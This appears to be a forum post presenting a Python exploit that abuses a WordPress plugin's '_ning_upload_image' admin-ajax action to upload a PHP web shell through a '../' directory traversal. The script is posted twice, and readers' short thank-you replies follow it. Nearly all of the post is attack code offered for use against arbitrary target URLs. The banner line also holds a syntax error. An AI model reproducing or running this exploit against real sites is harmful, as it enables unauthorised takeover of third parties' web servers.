Wordpress Websites Remote File Upload Exploit

# Exploit Title: Wordpress Websites Remote File Upload Exploit
# Author: Emyounoone
# Date: 11/04/2021
# Tested On: Kali Linux
# Contact: https://www.instagram.com/emyounoone/
# Exploit version: 1.0

--------------------------------------------------------------------------------------------

# Usage: python3 exploit.py [target url] [php file]
# Example: python3 exploit.py https://target-website.com ./shell.php


import os.path
from os import path
import json
import requests;
import sys

def print_banner():
    print("WP Websites Remote File Upload Exploit)
    print("Author -> Emyounoone")

def print_usage():
    print("Usage: python3 exploit.py [target url] [php file]")
    print("Example: python3 exploit.py https://example.com ./shell.php")

def vuln_check(uri):
    response = requests.get(uri)
    raw = response.text

    if ("no files found" in raw):
        return True;
    else:
        return False;

def main():

    print_banner()
    if(len(sys.argv) != 3):
        print_usage();
        sys.exit(1);

    base = sys.argv[1]
    file_path = sys.argv[2]

    ajax_action = '_ning_upload_image'
    admin = '/wp-admin/admin-ajax.php';

    uri = base + admin + '?action=' + ajax_action ;
    check = vuln_check(uri);

    if(check == False):
        print("(*) Target not vulnerable!");
        sys.exit(1)

    if( path.isfile(file_path) == False):
        print("(*) Invalid file!")
        sys.exit(1)

    files = {'files[]' : open(file_path)}
    data = {
    "allowed_file_types" : "php,jpg,jpeg",
    "upload" : json.dumps({"dir" : "../"})
    }
    print("Uploading Shell...");
    response = requests.post(uri, files=files, data=data )
    file_name = path.basename(file_path)
    if(file_name in response.text):
        print("Shell Uploaded!")
        if(base[-1] != '/'):
            base += '/'
        print(base + file_name)
    else:
        print("Shell Upload Failed")
        sys.exit(1)

main();

 

# Exploit Title: Wordpress Websites Remote File Upload Exploit
# Author: Emyounoone
# Date: 11/04/2021
# Tested On: Kali Linux
# Contact: https://www.instagram.com/emyounoone/
# Exploit version: 1.0

--------------------------------------------------------------------------------------------

# Usage: python3 exploit.py [target url] [php file]
# Example: python3 exploit.py https://target-website.com ./shell.php


import os.path
from os import path
import json
import requests;
import sys

def print_banner():
    print("WP Websites Remote File Upload Exploit)
    print("Author -> Emyounoone")

def print_usage():
    print("Usage: python3 exploit.py [target url] [php file]")
    print("Example: python3 exploit.py https://example.com ./shell.php")

def vuln_check(uri):
    response = requests.get(uri)
    raw = response.text

    if ("no files found" in raw):
        return True;
    else:
        return False;

def main():

    print_banner()
    if(len(sys.argv) != 3):
        print_usage();
        sys.exit(1);

    base = sys.argv[1]
    file_path = sys.argv[2]

    ajax_action = '_ning_upload_image'
    admin = '/wp-admin/admin-ajax.php';

    uri = base + admin + '?action=' + ajax_action ;
    check = vuln_check(uri);

    if(check == False):
        print("(*) Target not vulnerable!");
        sys.exit(1)

    if( path.isfile(file_path) == False):
        print("(*) Invalid file!")
        sys.exit(1)

    files = {'files[]' : open(file_path)}
    data = {
    "allowed_file_types" : "php,jpg,jpeg",
    "upload" : json.dumps({"dir" : "../"})
    }
    print("Uploading Shell...");
    response = requests.post(uri, files=files, data=data )
    file_name = path.basename(file_path)
    if(file_name in response.text):
        print("Shell Uploaded!")
        if(base[-1] != '/'):
            base += '/'
        print(base + file_name)
    else:
        print("Shell Upload Failed")
        sys.exit(1)

main();

eyvallah usta

 

nice bro

 

Eys